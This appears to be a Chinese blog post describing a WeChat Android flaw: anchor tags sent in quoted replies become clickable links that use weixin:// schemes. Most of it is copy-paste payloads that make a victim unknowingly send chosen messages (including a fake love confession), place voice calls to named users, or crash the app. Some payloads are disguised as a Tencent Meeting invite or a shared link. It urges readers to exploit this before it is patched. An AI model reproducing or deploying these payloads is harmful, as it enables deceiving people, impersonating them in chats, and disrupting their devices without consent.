0x00 前言

警惕,最近如果有人引用一句话,发送了一句蓝色的消息,千万不要点击(血的教训...)

​​0x01 漏洞分析

<a href="weixin://bizmsgmenu?msgmenucontent=[别人给你发送的消息]&msgmenuid=960">[显示的蓝色字体]</a>

其实就是解析了http语法,可以作为xss跨站脚本漏洞

href可以修改为指定网站,作为跳转处,a标签中间为显示的字样

0x02 利用方案

刚刚摸到一个离谱的小彩蛋！只要点击你发的消息就可以自动触发指定语句，玩了一会摸清套路了哈哈哈～具体触发姿势待看我如下分晓:

注意:仅安卓最新版本微信可直接利用,苹果/电脑等都不可直接利用.

step1:引用发言

首先可以随便发一段文字,或者引用别人发的文字

step2:输入javascript代码并发送

引用其他人或者自己的消息之后,可以输入代码发送,此处存在两种场景

群聊场景

思路:可以引用一些重磅大瓜,拼多多砍一刀,哔哩哔哩链接等

​​

语句如下:

<a href="weixin://bizmsgmenu?msgmenucontent=爸爸&msgmenuid=960">#小程序://滴滴出行丨打车骑行公交租车代驾/koU90O77eHaKPAI
</a>

注意,需要修改位置如下:

<a href="weixin://bizmsgmenu?msgmenucontent=[别人给你发送的消息]&msgmenuid=960">[显示的蓝色字体]
</a>

此处存在两种场景:

对方已经加你为好友

​​

对方并没有加你好友

​​

私聊场景

思路:可以引用一些重磅大瓜,拼多多砍一刀,哔哩哔哩链接等

​​

对方将会直接发送你需要发送的文字

<a
href="weixin://bizmsgmenu
?msgmenucontent=%e7%88%b8%e7%88%b8&msgmenuid=960">点一下试试</a>

拓展一下,如何让女神给你表白?

<a
href="weixin://bizmsgmenu
?msgmenucontent=我喜欢你 可以做我男朋友嘛?&msgmenuid=960">点击此处有惊喜</a>

但是,骗骗自己可以,别骗兄弟们,女神怎么会给你表白呢?

具体案例

案例1:让女神给自己表白

​​

<a
href="weixin://bizmsgmenu
?msgmenucontent=我喜欢你 可以做我男朋友嘛?&msgmenuid=960">点击此处有惊喜</a>

案例2:利用钉钉会议让消息看起来更真实

​​

0x5T4Rer 邀请您参加腾讯会议
会议主题：0day漏洞挖掘分享
会议时间：2025/07/13 19:03-22:03 (GMT+08:00) 中国标准时间 - 北京

点击链接直接加入会议：
<a href="weixin://bizmsgmenu?msgmenucontent=爸爸&msgmenuid=960">https://meeting.tencent.com/dm/PRxGCy2HmecW</a>

<a href="weixin://bizmsgmenu?msgmenucontent=爸爸&msgmenuid=960">#腾讯会议:520-131-456</a>

复制该信息，打开手机腾讯会议即可参与

案例3:跳转到博客

<a
href="http://www.0xstar.cn:8080">点击此处有惊喜</a>

案例4:闪退

<a
href="weixin://jump/voipdetail/?data=1">别点，会闪退</a>

案例5:打语音

<a href="weixin://voip/callagain/?username=-0x5T4Rer-">给我打个电话好嘛</a>
<a href="weixin://voip/callagain/?username=[此处修改为指定微信号]">给我打个电话好嘛</a>

案例6:给马化腾打语音

<a href="weixin://voip/callagain/?username=ponyma">点我和马化腾打电话</a>

​​

​​

0x03 总结

建议速速玩一下,晚点微信修复了,就短时间内没有这种有趣的漏洞了!